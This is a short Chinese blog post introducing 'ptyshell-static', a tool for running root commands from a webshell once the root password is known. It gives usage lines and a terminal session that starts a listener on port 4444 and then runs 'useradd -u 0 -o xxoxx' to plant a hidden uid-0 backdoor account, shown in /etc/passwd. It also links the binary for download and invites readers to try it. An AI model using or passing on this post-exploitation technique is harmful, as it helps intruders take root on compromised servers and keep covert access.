一个知道root密码可以在webshell里面执行命令的程序

作者:xi4oyu

[[email protected] tmp]$ ls -l
total 488
-rwxr-xr-x 1 root root 494816 Oct 4 07:08 ptyshell-static
[[email protected] tmp]$ md5sum ptyshell-static
3ea2a909f736660097c0248d403bbe80 ptyshell-static
[[email protected] tmp]$ ./ptyshell-static
ptyshell v0.4
orignal written by wzt ,psexec feature added by xi4oyu
usage: ./ptyshell-static <port> | <remote ip> <port>
./ptyshell-static -u username -p password -c command -pd port

使用方法:
[[email protected] tmp]$ ./ptyshell-static 4444
[[email protected] tmp]$ grep xxoxx /et c/passwd
[[email protected] tmp]$ ./ptyshell-static -u root -p test -c “useradd -u 0 -o xxoxx” -dp 4444
Beginning to send command!
[[email protected] tmp]$ grep xxoxx /et c/passwd
xxoxx:x:0:510::/home/xxoxx:/bi n/bash
[[email protected] tmp]$

执行第二个命令的时候需要等待几秒,以后的命令执行都不需要再执行./ptyshell-stat 4444了。直接执行第二个命令就行。注意命令用””包含起来,命令表太长了,哈哈,否则不能执行可别怪我。

这里webshell里面也可以执行的,一个道理,呵呵。纯属2B之作,大家随便玩玩。

感谢tr宝宝提供空间

http://www.pcsec.org/upload/2008/12/ptyshell-static.rar

相关日志

抢楼还有机会... 抢座Rss 2.0或者 Trackback

发表评论